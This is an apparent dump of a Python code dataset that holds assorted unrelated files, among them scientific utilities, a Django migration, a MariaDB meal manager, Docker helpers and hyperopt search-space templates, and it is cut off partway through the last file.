content
stringlengths
0
1.05M
origin
stringclasses
2 values
type
stringclasses
2 values
""" This module consists of functions to calculate the [equivalent latitude](https://journals.ametsoc.org/doi/citedby/10.1175/1520-0469%282003%29060%3C0287%3ATELADT%3E2.0.CO%3B2) and edge of a polar vortex using [Nash criteria](https://agupubs.onlinelibrary.wiley.com/doi/10.1029/96JD00066). ### Installation ``` pip install -U pyvortex ``` install the latest version using ``` pip install git+https://github.com/pankajkarman/pyvortex.git ``` ### Usage `pyvortex` is easy to use. Just import: ```python import pyvortex as vr ``` #### Northern Hemisphere Instantiate the `PolarVortex` class using: ```python pol = PolarVortex(pv, uwind) ``` Get equivalent lqtitude for the provided vorticity data as: ```python eql = pol.get_eql() ``` If you want to get both equivalent latitude and Vortex edge, just use: ```python eql = pol.get_edge(min_eql=30) ``` #### Southern Hemisphere Flip pv and uwind along latitude dimension and multiply pv by -1. All other things will be the same. """ from .pyvortex import PolarVortex
nilq/baby-python
python
'''
Problem 9
25 January 2002

A Pythagorean triplet is a set of three natural numbers, a < b < c, for which,
a^2 + b^2 = c^2

For example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.

There exists exactly one Pythagorean triplet for which a + b + c = 1000.
Find the product abc.
----------------------------------------------------------
Created on 26.01.2012

@author: ahallmann
'''
import unittest
import timeit
import math


def is_pythagorean_triplet(a, b, c):
    """Return True when a^2 + b^2 == c^2 (squares truncated to ints)."""
    return int(a * a) + int(b * b) == int(c * c)


def solve(tripletSum):
    """Return a*b*c for the Pythagorean triplet with a + b + c == tripletSum.

    Uses integer arithmetic only: for each (a, b) pair, c is forced to be
    tripletSum - a - b, so no floating-point equality test is needed.
    (The original computed c = sqrt(a*a + b*b) and compared the float sum
    `a + b + c == tripletSum`, which can miss the solution to rounding.)

    Returns None when no such triplet exists.
    """
    for a in range(1, tripletSum):
        # a < b < c, so b starts just above a.
        for b in range(a + 1, tripletSum - a):
            c = tripletSum - a - b
            if c <= b:
                break  # c must stay strictly larger than b
            if a * a + b * b == c * c:
                return a * b * c
    return None


class Test(unittest.TestCase):
    def testSimple0(self):
        self.assertTrue(is_pythagorean_triplet(1, 1, math.sqrt(2)))

    def testSimple1(self):
        self.assertTrue(is_pythagorean_triplet(3, 4, 5))

    def testSimple2(self):
        self.assertFalse(is_pythagorean_triplet(3, 4, 6))

    def test_answer(self):
        self.assertEqual(31875000, solve(1000))


# -----------------------------------------
def run():
    return solve(1000)


if __name__ == '__main__':
    # Time one run BEFORE unittest.main(): unittest.main() calls sys.exit(),
    # so the original's second `__main__` block (which also used Python 2
    # print syntax) was unreachable.
    t = timeit.Timer("run()", "from __main__ import run")
    count = 1
    print("{} seconds for {} runs".format(t.timeit(count), count))
    unittest.main()
nilq/baby-python
python
# from django_filters import Filter # Add your filters here
nilq/baby-python
python
import shap
import numpy as np
import cv2


class BetterImageMasker(shap.maskers.Image):
    """Image masker that validates input size before masking.

    Behaves like ``shap.maskers.Image.__call__`` but raises a clear error
    when the flattened input does not match the shape given to the
    constructor.
    """

    def __call__(self, mask, x):
        """Apply ``mask`` to image ``x`` using the configured mask value.

        Args:
            mask: boolean array (or None) selecting pixels to KEEP;
                  masked-out pixels are replaced by blur/inpaint/constant.
            x: image whose element count must match ``self.input_shape``.

        Returns:
            1-tuple containing the masked image, reshaped to x's shape.
        """
        # Validate total element count against the declared input shape.
        if np.prod(x.shape) != np.prod(self.input_shape):
            raise Exception("The length of the image to be masked must match the shape given in the " + \
                            "ImageMasker contructor: "+" * ".join([str(i) for i in x.shape])+ \
                            " != "+" * ".join([str(i) for i in self.input_shape]))

        # unwrap single element lists (which are how single input models look in multi-input format)
        if isinstance(x, list) and len(x) == 1:
            x = x[0]

        # we preserve flattend inputs as flattened and full-shaped inputs as their original shape
        in_shape = x.shape
        if len(x.shape) > 1:
            x = x.ravel()

        # if mask is not given then we mask the whole image
        if mask is None:
            # FIX: np.bool was removed in NumPy 1.24; the builtin ``bool``
            # is the supported dtype spelling.
            mask = np.zeros(np.prod(x.shape), dtype=bool)

        if isinstance(self.mask_value, str):
            if self.blur_kernel is not None:
                # Cache the blurred image per input object id so repeated
                # masks of the same image reuse one cv2.blur call.
                if self.last_xid != id(x):
                    self._blur_value_cache = cv2.blur(x.reshape(self.input_shape), self.blur_kernel).ravel()
                    self.last_xid = id(x)
                out = x.copy()
                out[~mask] = self._blur_value_cache[~mask]
            elif self.mask_value == "inpaint_telea":
                out = self.inpaint(x, ~mask, "INPAINT_TELEA")
            elif self.mask_value == "inpaint_ns":
                out = self.inpaint(x, ~mask, "INPAINT_NS")
        else:
            # Constant per-pixel mask values.
            out = x.copy()
            out[~mask.flatten()] = self.mask_value[~mask.flatten()]

        return (out.reshape(1, *in_shape),)
nilq/baby-python
python
# Generated by Django 2.1.5 on 2019-01-05 14:44 import django.contrib.postgres.fields import django.core.validators from django.db import migrations, models import reader.validators class Migration(migrations.Migration): dependencies = [ ('reader', '0011_auto_20181001_1853'), ] operations = [ migrations.AlterField( model_name='article', name='uri', field=models.URLField(blank=True, max_length=2048), ), migrations.AlterField( model_name='board', name='name', field=models.CharField(max_length=100, verbose_name='name'), ), migrations.AlterField( model_name='board', name='tags', field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=40), blank=True, default=list, size=100, verbose_name='tags'), ), migrations.AlterField( model_name='feed', name='name', field=models.CharField(max_length=100, verbose_name='name'), ), migrations.AlterField( model_name='feed', name='uri', field=models.URLField(max_length=2048, unique=True, validators=[django.core.validators.URLValidator(schemes=['http', 'https']), reader.validators.http_port_validator], verbose_name='Feed address'), ), ]
nilq/baby-python
python
# -*- coding: utf-8 -*-
import numpy as np
from ipywidgets import interact
from PIL import Image

# [Preparation]
# - check installation of jupyter and ipywidgets with
#   `pip list | grep ipywidgets`
# - make the following jupyter extension enable
#   jupyter nbextension enable --py widgetsnbextension --sys-prefix


def display_image_batch(batch, order_bgr=False, order_nchw=False, global_norm=False):
    """Browse a batch of images interactively inside a Jupyter notebook.

    Args:
        batch: sequence/array of N images; float batches are normalized to
               the uint8 [0, 255] range before display.
        order_bgr: if True, swap channels BGR -> RGB before display.
        order_nchw: if True, images are (C, H, W) and are transposed to (H, W, C).
        global_norm: normalize float data with one min/max over the whole
               batch instead of per image.
    """
    # batch.shape = (N,C,H,W)
    N = len(batch)
    min_values = np.zeros(N, dtype=np.float32)
    max_values = np.ones(N, dtype=np.float32) * 255
    normalize = False
    # FIX: np.float was removed in NumPy 1.24; np.floating is the correct
    # abstract dtype for issubdtype checks on float data.
    if isinstance(batch, np.ndarray) and np.issubdtype(batch.dtype, np.floating):
        if global_norm:
            min_values[:] = batch.min()
            max_values[:] = batch.max()
        else:
            # Per-image min/max over the flattened pixels.
            min_values[:] = np.min(batch.reshape(N, -1), axis=1)
            max_values[:] = np.max(batch.reshape(N, -1), axis=1)
        normalize = True

    def display_image(idx):
        img = batch[idx].copy()
        if normalize:
            min_value = min_values[idx]
            max_value = max_values[idx]
            if max_value > min_value:
                img = np.clip(255.0/(max_value-min_value) * (img-min_value), 0, 255).astype(np.uint8)
            else:
                # Constant image: avoid division by zero.
                img = np.clip(255.0*(img-min_value), 0, 255).astype(np.uint8)
        if img.ndim == 3:
            if order_nchw:
                # img.shape = [C,H,W]
                img = img.transpose(1, 2, 0)
            if img.shape[2] == 3 and order_bgr:
                img[..., [0, 1, 2]] = img[..., [2, 1, 0]]
            if img.shape[2] == 1:
                img = img[..., 0]  # convert [H,W,1] to [H,W]
        return Image.fromarray(img)

    # NOTE(review): `batch=batch` is not a parameter of display_image —
    # looks unnecessary for ipywidgets.interact; confirm it is intended.
    interact(display_image, batch=batch, idx=(0, N-1, 1));


#def switch_pylab_notebook():
#    %pylab notebook
#    %pylab notebook # I don't know why but execution twice is fine for system

#def switch_pylab_inline():
#    %pylab inline
nilq/baby-python
python
# Interactive grade-book script: collects a name and two marks per student,
# prints a table of averages, then lets the user look up one student's marks
# by their sequential id (999 exits the lookup loop).

i = 0            # sequential id assigned to each student
classe = []      # each entry: [id, name, mark1, mark2, average]
continuar = ''
while True:
    nome = str(input('Nome: ').strip())
    nota1 = float(input('Nota 1: ').strip())
    nota2 = float(input('Nota 2: ').strip())
    classe.append([i, nome, nota1, nota2, (nota1 + nota2) / 2])
    # Re-prompt until the user types an S/N answer (first character only).
    while True:
        continuar = str(input('Quer continuar? [S/N] ').strip()[0])
        if continuar not in 'SsNn':
            print('\033[31mValor informado inválido!\033[m')
        else:
            break
    if continuar in 'Nn':
        break
    i += 1
# Summary table: id, name, average.
print('-=' * 30)
print(f'{"No.":<4}{"NOME":<10}{"MÉDIA":>8}')
print('-' * 26)
for c in classe:
    print(f'{c[0]:<4}{c[1]:<10}{c[4]:>8.1f}')
print('-' * 40)
# Per-student lookup loop; '999' anywhere in the answer terminates.
while True:
    continuar = str(input('Mostrar notas de qual aluno? (999 interrompe): '))
    if '999' in continuar:
        print('FINALIZANDO...')
        break
    for c in classe:
        # NOTE(review): int() raises ValueError on non-numeric input here —
        # confirm whether that crash path is acceptable.
        if int(continuar) == c[0]:
            print(f'As notas de {c[1]} são [{c[2]}, {c[3]}]')
print(' <<< VOLTE SEMPRE >>> ')
nilq/baby-python
python
# Individual image generator import sys HW_NUMBER = int(sys.argv[1]) Q_NUMBER = int(sys.argv[2]) HW_PATH = sys.argv[3] + "/body.tex" f = open(HW_PATH, 'r') content = [n for n in f.readlines() if (not n.startswith('%') and not n.startswith('\sol') and n.strip())] def index_containing_substring(the_list, substring): for i, s in enumerate(the_list): if substring in s: return i return -1 index_of_beginqunlist = index_containing_substring(content, 'begin{qunlist}') index_of_endqunlist = index_containing_substring(content, 'end{qunlist}') index_of_maketitle = index_containing_substring(content, 'maketitle') index_of_enddoc = index_containing_substring(content, 'end{document}') new_content = [] for i in range(index_of_beginqunlist): if i < index_of_maketitle: new_content.append(content[i]) # There may be extra empty lines, comments, etc in the qunlist section. # So we'll find the Q'th \input{q_ line. index_of_q_number = -1 # In theory it is (index_of_beginqunlist + Q_NUMBER) current_q = 0 for i in range(index_of_beginqunlist+1, index_of_endqunlist): if "\input{q_" in content[i]: current_q += 1 if current_q == Q_NUMBER: index_of_q_number = i break assert index_of_q_number != -1, "Can't find the given question number" new_content.append('\def\qcontributor#1{}') # Hack to disable contributor list from generating a large footer at the bottom new_content.append('\\pagestyle{empty}') # <-- doesn't seem to do anything/work? new_content.append(content[index_of_beginqunlist]) new_content.append('\setcounter{sparectr}{' + str(Q_NUMBER - 1) + '}') new_content.append(content[index_of_q_number]) new_content.append(content[index_of_endqunlist]) new_content.append(content[index_of_enddoc]) with open(HW_PATH, 'w+') as f2: for line in new_content: f2.write(line + "\n")
nilq/baby-python
python
from typing import Sequence, Union, Optional
from typing_extensions import Literal

from .transforms import CriteriaFn
from .deform import deform_image_random
from ..transforms import transforms


class TransformRandomDeformation(transforms.TransformBatchWithCriteria):
    """
    Transform an image using a random deformation field.

    Only 2D or 3D transformations are supported.  The gradient can be
    back-propagated through this transform.
    """
    def __init__(
            self,
            control_points: Union[int, Sequence[int]] = 6,
            max_displacement: Optional[Union[float, Sequence[float]]] = 0.5,
            criteria_fn: Optional[CriteriaFn] = None,
            interpolation: Literal['linear', 'nearest'] = 'linear',
            padding_mode: Literal['zeros', 'border', 'reflection'] = 'zeros',
            gaussian_filter_sigma: Optional[float] = 1.5,
            align_corners: bool = False):
        """
        Args:
            control_points: the control points spread on the image at regularly
                spaced intervals with random `max_displacement` magnitude
            max_displacement: specify the maximum displacement of a control point.
                Range [-1..1]. If None, use the moving volume shape and number of
                control points to calculate an appropriately small deformation field
            interpolation: the interpolation of the image with displacement field
            padding_mode: how to handle data outside the volume geometry
            align_corners: should be False. The (0, 0) is the center of a voxel
            gaussian_filter_sigma: if not None, smooth the deformation field using
                a gaussian filter. The smoothing is done in the control point space
            criteria_fn: a function to select applicable features in a batch
        """
        self.interpolation = interpolation
        self.align_corners = align_corners
        self.max_displacement = max_displacement
        self.control_points = control_points
        self.padding_mode = padding_mode
        self.gaussian_filter_sigma = gaussian_filter_sigma

        # Default criterion: only transform features that are 4D (N, C, H, W)
        # or higher, i.e. image-like arrays.
        if criteria_fn is None:
            criteria_fn = transforms.criteria_is_array_4_or_above
        self.criteria_fn = criteria_fn

        super().__init__(
            criteria_fn=criteria_fn,
            transform_fn=self._transform
        )

    def _transform(self, features_names, batch):
        """Apply ONE random deformation jointly to all selected features.

        All selected features must share the same spatial shape and batch
        size so a single displacement field applies to all of them.
        """
        data_shape = batch[features_names[0]].shape
        data_dim = len(data_shape) - 2  # remove `N` and `C` components
        assert data_dim == 2 or data_dim == 3, f'only 2D or 3D data handled. Got={data_dim}'

        for name in features_names[1:]:
            # make sure the data is correct: we must have the same dimensions (except `C`)
            # for all the images
            feature = batch[name]
            feature_shape = feature.shape[2:]
            assert feature_shape == data_shape[2:], f'joint features transformed must have the same dimension. ' \
                                                    f'Got={feature_shape}, expected={data_shape[2:]}'
            assert feature.shape[0] == data_shape[0]

        images = [batch[name] for name in features_names]
        deformed_images = deform_image_random(
            images,
            control_points=self.control_points,
            max_displacement=self.max_displacement,
            interpolation=self.interpolation,
            padding_mode=self.padding_mode,
            align_corners=self.align_corners,
            gaussian_filter_sigma=self.gaussian_filter_sigma
        )

        # copy features that are not images
        new_batch = {name: value for name, value in zip(features_names, deformed_images)}
        for name, value in batch.items():
            if name not in new_batch:
                new_batch[name] = value
        return new_batch
nilq/baby-python
python
import stk

from .utilities import is_equivalent_atom


def test_repr(atom):
    """
    Test :meth:`.Atom.__repr__`.

    Parameters
    ----------
    atom : :class:`.Atom`
        The atom, whose representation should be tested.

    Returns
    -------
    None : :class:`NoneType`

    """
    # Round-trip: evaluating the repr inside the stk namespace must
    # rebuild an equivalent atom.
    rebuilt = eval(repr(atom), dict(stk.__dict__))
    is_equivalent_atom(rebuilt, atom)
nilq/baby-python
python
#####################################################################################
# Manager class of Meal which deals with Meal saving / loading / setting / deleting #
#####################################################################################

from Manager import Manager
from Models.Meal import Meal
import mysql.connector as mariadb
import pymysql
import sys


class MealManager(Manager):
    """Database access object for the `Meal` table."""

    def __init__(self, usr="toor", psswd="toor"):
        self.table = "Meal"
        Manager.__init__(self, self.table, usr, psswd)

    def db_create(self, name):
        """ Create a meal in the database from a name
        :param name : the name of the meal
        :return: the Meal object if successfully created else, False """
        connect = self.get_connector()
        cursor = connect.cursor(prepared=True)
        try:
            cursor.execute("INSERT INTO `{}` (name_meal) VALUES (?)".format(self.table), (name,))
            connect.commit()
        except mariadb.errors.IntegrityError:
            sys.stderr.write("The meal name {} may already exist.".format(name))
            return False
        except mariadb.Error:
            sys.stderr.write("An error occurred with the meal creating.")
            return False
        finally:
            # Always release the connection, including on error paths
            # (the original leaked it when an exception was raised).
            connect.close()
        # get_current_id() returns the NEXT assignable id, so the row we
        # just inserted got id - 1.
        id = self.get_current_id() - 1
        return Meal(id, name)

    def db_create_from_obj(self, meal):
        """ Create a meal in the database from a Meal object
        :param meal : the Meal object to create in database
        :return: True if success else False """
        self.check_managed(meal)
        connect = self.get_connector()
        cursor = connect.cursor(prepared=True)
        try:
            cursor.execute("INSERT INTO `{}` (id_meal, name_meal) VALUES (?, ?)".format(self.table),
                           (meal.get_id_meal(), meal.get_name_meal()))
            connect.commit()
        except mariadb.errors.IntegrityError:
            # FIX: used to call the nonexistent meal.get_name()/get_id(),
            # which raised AttributeError instead of reporting the error.
            sys.stderr.write("The meal name {} or the meal id {} may already exist.".format(
                meal.get_name_meal(), str(meal.get_id_meal())))
            return False
        except mariadb.Error:
            sys.stderr.write("An error occurred with the meal creating.")
            return False
        finally:
            connect.close()
        return True

    def db_delete(self, id=None, name=None):
        """ Delete a meal by its name or its id from the database (soft delete)
        :param ? id : the id of the meal to delete
        :param ? name : the name of the meal to delete
        :return: False if no parameters given or if an error occurs else True """
        if name is None and id is None:
            sys.stderr.write("No name or id mentioned.")
            return False
        connect = self.get_connector()
        cursor = connect.cursor(prepared=True)
        try:
            # Soft delete only: rows are flagged, never removed.
            if id is not None:
                cursor.execute("UPDATE `{}` SET deleted = 1 WHERE id_meal = %s".format(self.table), (id,))
            else:
                cursor.execute("UPDATE `{}` SET deleted = 1 WHERE name_meal = %s".format(self.table), (name,))
            connect.commit()
        except mariadb.Error:
            sys.stderr.write("An error occurred with the meal deleting.")
            return False
        finally:
            connect.close()
        return True

    def db_save(self, meal):
        """ Save a Meal object into database
        :param meal : the object to save
        :return: False if an error occurred else True """
        self.check_managed(meal)
        connect = self.get_connector()
        cursor = connect.cursor()
        try:
            # FIX: parameterized query — the original interpolated the meal
            # name directly into the SQL string (injection / quoting bugs).
            cursor.execute('UPDATE `{}` SET `name_meal` = %s WHERE `id_meal` = %s'.format(self.table),
                           (meal.get_name_meal(), meal.get_id_meal()))
            connect.commit()
        except mariadb.Error:
            sys.stderr.write("An error occurred with the meal saving.")
            return False
        finally:
            connect.close()
        return True

    def db_load(self, id=None, name=None):
        """ From an id or a name, load a Meal object from the database
        :param id : the id of the meal to load
        :param name : the name of the meal to load
        :return: the Meal object loaded, None if not in database """
        if name is None and id is None:
            sys.stderr.write("No name or id mentioned.")
            return False
        connect = self.get_connector()
        cursor = connect.cursor(dictionary=True)
        try:
            # FIX: parameterized WHERE clause — the original formatted the
            # (escaped but unquoted) value straight into the SQL text.
            if id is not None:
                cursor.execute("SELECT Meal.id_meal, Meal.name_meal, Ingredient.id_ingredient, Ingredient.name_ingredient, "
                               "Recipe.quantity, Meal.deleted FROM `{}` INNER JOIN Recipe ON Meal.id_meal = Recipe.id_meal INNER JOIN "
                               "Ingredient ON Recipe.id_ingredient = Ingredient.id_ingredient WHERE Meal.id_meal = %s "
                               "AND Meal.deleted = 0".format(self.table), (id,))
            else:
                cursor.execute("SELECT Meal.id_meal, Meal.name_meal, Recipe.id_ingredient, Ingredient.name_ingredient, "
                               "Recipe.quantity, Meal.deleted FROM `{}` INNER JOIN Recipe ON Meal.id_meal = Recipe.id_meal INNER JOIN "
                               "Ingredient ON Recipe.id_ingredient = Ingredient.id_ingredient WHERE Meal.name_meal = %s "
                               "AND Meal.deleted = 0".format(self.table), (name,))
            answ = cursor.fetchall()
        finally:
            connect.close()
        return Meal().init(answ) if answ else None

    def get_listview_info(self):
        """ Returns all the information from Meal database (deleted = 0) formatted to
        display on ListView widget (id, name)
        :return: answ : The result of the query """
        connect = self.get_connector()
        cursor = connect.cursor()
        try:
            cursor.execute('SELECT id_meal, name_meal FROM {} WHERE Meal.deleted = 0'.format(self.table))
            answ = cursor.fetchall()
        finally:
            connect.close()
        return answ

    def get_current_id(self):
        """ Returns the current id, useful to create associated objects in conformity
        with the database values and constraints
        :return: the current assignable id """
        connect = self.get_connector()
        cursor = connect.cursor()
        try:
            cursor.execute('SELECT MAX(id_meal) FROM {}'.format(self.table))
            # FIX: fetch BEFORE closing the connection — the original called
            # fetchall() after connect.close(), which fails.
            max_id = cursor.fetchall()[0][0]
        finally:
            connect.close()
        # MAX() is NULL on an empty table: start ids at 1 in that case
        # (the original crashed on int(None)).
        return 1 if max_id is None else int(max_id) + 1

    @staticmethod
    def check_managed(item):
        """ Check if the parameter is from the type of the managed item, if not raise ValueError
        :param item : the item to verify """
        if not isinstance(item, Meal):
            raise ValueError('The parameter must be a Meal instance.')
nilq/baby-python
python
#!/usr/bin/env python # coding: utf-8 # In[1]: def gpa_cal(scores : str,base:int = 10) -> float: """Return float Grade Point Average for anyy base with default as 10 A- and B+ aree treated as similar, althouh functionality can be modified""" gpa_final = 0.0 scores = scores.upper() # To allow for mistypes in scores entered gpa_final += scores.count('+') # increments score by 1 for each plus gpa_final -= scores.count('-') # decrements score by 1 for each minus # Remove + and minus from string scores = "".join(scores.split('+')) # Splits across + and joins scores string again scores = "".join(scores.split('-')) # Splits across - and joins scores string again if len(scores) == 0: raise ValueError("Invalid Grades entered as input") grading = {} # dict stores value alloted to each grade for value in range(0,base): grading[chr(65+value)] = base-value-1 for grade in scores: try: gpa_final += grading[grade] except KeyError as e: raise KeyError("Incorrect Symbol entered {!r}".format(e)) gpa_final = gpa_final/len(scores) print("if you want to convert GPA from 10 scale to scale of 3 or 4 or 5 - Press 1 else Press 0") inp = int(input()) if inp==1: print("To convert base convert GPA from 10 scale to scale of 3 - Press 3") print("To convert base convert GPA from 10 scale to scale of 4 - Press 4") print("To convert base convert GPA from 10 scale to scale of 5 - Press 5") scaling=int(input()) if scaling==3: gpa_final = (gpa_final/10)*3 elif scaling==4: gpa_final = (gpa_final/10)*4 else: gpa_final = (gpa_final/10)*5 return gpa_final if __name__ == "__main__": print(gpa_cal('AAA+BCADE',10)) # Test case in issue # In[ ]:
nilq/baby-python
python
from docker import DockerClient

from aavm.utils.progress_bar import ProgressBar
from cpk.types import Machine, DockerImageName

# Docker container lifecycle states, grouped by what they mean for us.
ALL_STATUSES = [
    "created", "restarting", "running", "removing", "paused", "exited", "dead"
]
STOPPED_STATUSES = [
    "created", "exited", "dead"
]
UNSTABLE_STATUSES = [
    "restarting", "removing"
]
RUNNING_STATUSES = [
    "running", "paused"
]


# noinspection DuplicatedCode
def pull_image(machine: Machine, image: str, progress: bool = True):
    """Pull `image` on `machine`, optionally rendering a progress bar.

    Progress is approximated as (layers completed / layers seen so far).
    """
    client: DockerClient = machine.get_client()
    layers = set()
    pulled = set()
    pbar = ProgressBar() if progress else None
    for line in client.api.pull(image, stream=True, decode=True):
        if "id" not in line or "status" not in line:
            continue
        layer_id = line["id"]
        layers.add(layer_id)
        if line["status"] in ["Already exists", "Pull complete"]:
            pulled.add(layer_id)
        # update progress bar
        if progress:
            percentage = max(0.0, min(1.0, len(pulled) / max(1.0, len(layers)))) * 100.0
            pbar.update(percentage)
    if progress:
        pbar.done()


def remove_image(machine: Machine, image: str):
    """Remove `image` from `machine`'s Docker daemon."""
    client: DockerClient = machine.get_client()
    client.images.remove(image)


def merge_container_configs(*args) -> dict:
    """Merge several container-config dicts into a new dict.

    Lists are concatenated, nested dicts are merged (later wins on key
    clashes), scalars are overwritten by later arguments.  Mixing value
    types for the same key raises ValueError.

    FIX: mutable values are shallow-copied on first sight — the original
    stored a reference to the first argument's list/dict and then
    extend()/update()d it in place, silently mutating the caller's data.
    """
    out = {}
    for arg in args:
        assert isinstance(arg, dict)
        for k, v in arg.items():
            if k not in out:
                # copy containers so later merges never touch the inputs
                if isinstance(v, list):
                    out[k] = list(v)
                elif isinstance(v, dict):
                    out[k] = dict(v)
                else:
                    out[k] = v
            else:
                if not isinstance(arg[k], type(out[k])):
                    raise ValueError(f"Type clash '{type(out[k])}' !== '{type(arg[k])}' "
                                     f"for key '{k}'.")
                if isinstance(out[k], list):
                    out[k].extend(arg[k])
                elif isinstance(out[k], dict):
                    out[k].update(arg[k])
                else:
                    out[k] = arg[k]
    return out


def sanitize_image_name(image: str) -> str:
    """Normalize a Docker image name to its fully-qualified form."""
    return DockerImageName.from_image_name(image).compile(allow_defaults=True)
nilq/baby-python
python
"""Hyperopt templates for different models""" # forked from hyperopt/hyperopt-sklearn from functools import partial import numpy as np from hyperopt import hp from hyperopt.pyll import scope import sklearn.discriminant_analysis import sklearn.ensemble import sklearn.feature_extraction.text import sklearn.preprocessing import sklearn.svm import sklearn.tree # Optional dependencies try: import xgboost except ImportError: xgboost = None def default_name_func(name): return name ############################## ##==== Global variables ====## ############################## _svm_default_cache_size = 512 ############################################### ##==== Various hyperparameter generators ====## ############################################### def hp_bool(name): return hp.choice(name, [False, True]) def _svm_gamma(name, n_features=1): '''Generator of default gamma values for SVMs. This setting is based on the following rationales: 1. The gamma hyperparameter is basically an amplifier for the original dot product or l2 norm. 2. The original dot product or l2 norm shall be normalized by the number of features first. ''' # -- making these non-conditional variables # probably helps the GP algorithm generalize # assert n_features >= 1 return hp.loguniform(name, np.log(1. / n_features * 1e-3), np.log(1. 
/ n_features * 1e3)) def _svm_degree(name): return hp.quniform(name, 1.5, 6.5, 1) def _svm_max_iter(name): return hp.qloguniform(name, np.log(1e7), np.log(1e9), 1) def _svm_C(name): return hp.loguniform(name, np.log(1e-5), np.log(1e5)) def _svm_tol(name): return hp.loguniform(name, np.log(1e-5), np.log(1e-2)) def _svm_int_scaling(name): return hp.loguniform(name, np.log(1e-1), np.log(1e1)) def _svm_epsilon(name): return hp.loguniform(name, np.log(1e-3), np.log(1e3)) def _svm_loss_penalty_dual(name): """ The combination of penalty='l1' and loss='hinge' is not supported penalty='l2' and loss='hinge' is only supported when dual='true' penalty='l1' is only supported when dual='false'. """ return hp.choice( name, [('hinge', 'l2', True), ('squared_hinge', 'l2', True), ('squared_hinge', 'l1', False), ('squared_hinge', 'l2', False)]) def _knn_metric_p(name, sparse_data=False, metric=None, p=None): if sparse_data: return ('euclidean', 2) elif metric == 'euclidean': return (metric, 2) elif metric == 'manhattan': return (metric, 1) elif metric == 'chebyshev': return (metric, 0) elif metric == 'minkowski': assert p is not None return (metric, p) elif metric is None: return hp.pchoice(name, [ (0.55, ('euclidean', 2)), (0.15, ('manhattan', 1)), (0.15, ('chebyshev', 0)), (0.15, ('minkowski', _knn_p(name + '.p'))), ]) else: return (metric, p) # undefined, simply return user input. def _knn_p(name): return hp.quniform(name, 2.5, 5.5, 1) def _knn_neighbors(name): return scope.int(hp.qloguniform(name, np.log(0.5), np.log(50.5), 1)) def _knn_weights(name): return hp.choice(name, ['uniform', 'distance']) def _trees_n_estimators(name): return scope.int(hp.qloguniform(name, np.log(9.5), np.log(3000.5), 1)) def _trees_criterion(name): return hp.choice(name, ['gini', 'entropy']) def _trees_max_features(name): return hp.pchoice( name, [ (0.2, 'sqrt'), # most common choice. (0.1, 'log2'), # less common choice. (0.1, None), # all features, less common choice. 
(0.6, hp.uniform(name + '.frac', 0., 1.)) ]) def _trees_max_depth(name): return hp.pchoice( name, [ (0.7, None), # most common choice. # Try some shallow trees. (0.1, 2), (0.1, 3), (0.1, 4), ]) def _trees_min_samples_split(name): return 2 def _trees_min_samples_leaf(name): return hp.choice( name, [ 1, # most common choice. scope.int( hp.qloguniform(name + '.gt1', np.log(1.5), np.log(50.5), 1)) ]) def _trees_bootstrap(name): return hp.choice(name, [True, False]) def _boosting_n_estimators(name): return scope.int(hp.qloguniform(name, np.log(10.5), np.log(1000.5), 1)) def _ada_boost_learning_rate(name): return hp.lognormal(name, np.log(0.01), np.log(10.0)) def _ada_boost_loss(name): return hp.choice(name, ['linear', 'square', 'exponential']) def _ada_boost_algo(name): return hp.choice(name, ['SAMME', 'SAMME.R']) def _grad_boosting_reg_loss_alpha(name): return hp.choice(name, [('ls', 0.9), ('lad', 0.9), ('huber', hp.uniform(name + '.alpha', 0.85, 0.95)), ('quantile', 0.5)]) def _grad_boosting_clf_loss(name): return hp.choice(name, ['deviance', 'exponential']) def _grad_boosting_learning_rate(name): return hp.lognormal(name, np.log(0.01), np.log(10.0)) def _grad_boosting_subsample(name): return hp.pchoice( name, [ (0.2, 1.0), # default choice. (0.8, hp.uniform(name + '.sgb', 0.5, 1.0) ) # stochastic grad boosting. 
]) def _sgd_penalty(name): return hp.pchoice(name, [(0.40, 'l2'), (0.35, 'l1'), (0.25, 'elasticnet')]) def _sgd_alpha(name): return hp.loguniform(name, np.log(1e-6), np.log(1e-1)) def _sgd_l1_ratio(name): return hp.uniform(name, 0, 1) def _sgd_epsilon(name): return hp.loguniform(name, np.log(1e-7), np.log(1)) def _sgdc_learning_rate(name): return hp.pchoice(name, [(0.50, 'optimal'), (0.25, 'invscaling'), (0.25, 'constant')]) def _sgdr_learning_rate(name): return hp.pchoice(name, [(0.50, 'invscaling'), (0.25, 'optimal'), (0.25, 'constant')]) def _sgd_eta0(name): return hp.loguniform(name, np.log(1e-5), np.log(1e-1)) def _sgd_power_t(name): return hp.uniform(name, 0, 1) def _random_state(name, random_state): if random_state is None: return hp.randint(name, 5) else: return random_state def _class_weight(name): return hp.choice(name, [None, 'balanced']) ############################################## ##==== SVM hyperparameters search space ====## ############################################## def _svm_hp_space(kernel, n_features=1, C=None, gamma=None, coef0=None, degree=None, shrinking=None, tol=None, max_iter=None, verbose=False, cache_size=_svm_default_cache_size): '''Generate SVM hyperparamters search space ''' if kernel in ['linear', 'rbf', 'sigmoid']: degree_ = 1 else: degree_ = (_svm_degree('degree') if degree is None else degree) if kernel in ['linear']: gamma_ = 'auto' else: gamma_ = (_svm_gamma('gamma', n_features=1) if gamma is None else gamma) gamma_ /= n_features # make gamma independent of n_features. 
if kernel in ['linear', 'rbf']: coef0_ = 0.0 elif coef0 is None: if kernel == 'poly': coef0_ = hp.pchoice( 'coef0', [(0.3, 0), (0.7, gamma_ * hp.uniform('coef0val', 0., 10.))]) elif kernel == 'sigmoid': coef0_ = hp.pchoice( 'coef0', [(0.3, 0), (0.7, gamma_ * hp.uniform('coef0val', -10., 10.))]) else: pass else: coef0_ = coef0 hp_space = dict( kernel=kernel, C=_svm_C('C') if C is None else C, gamma=gamma_, coef0=coef0_, degree=degree_, shrinking=(hp_bool('shrinking') if shrinking is None else shrinking), tol=_svm_tol('tol') if tol is None else tol, max_iter=(_svm_max_iter('maxiter') if max_iter is None else max_iter), verbose=verbose, cache_size=cache_size) return hp_space def _svc_hp_space(random_state=None, probability=False): '''Generate SVC specific hyperparamters ''' hp_space = dict( random_state=_random_state('rstate', random_state), probability=probability) return hp_space def _svr_hp_space(epsilon=None): '''Generate SVR specific hyperparamters ''' hp_space = {} hp_space['epsilon'] = (_svm_epsilon('epsilon') if epsilon is None else epsilon) return hp_space ######################################### ##==== SVM classifier constructors ====## ######################################### def svc_kernel_hp_space(kernel, random_state=None, probability=False, **kwargs): """ Return a hyperparamter template that will construct a sklearn.svm.SVC model with a user specified kernel. Supported kernels: linear, rbf, poly and sigmoid """ hp_space = 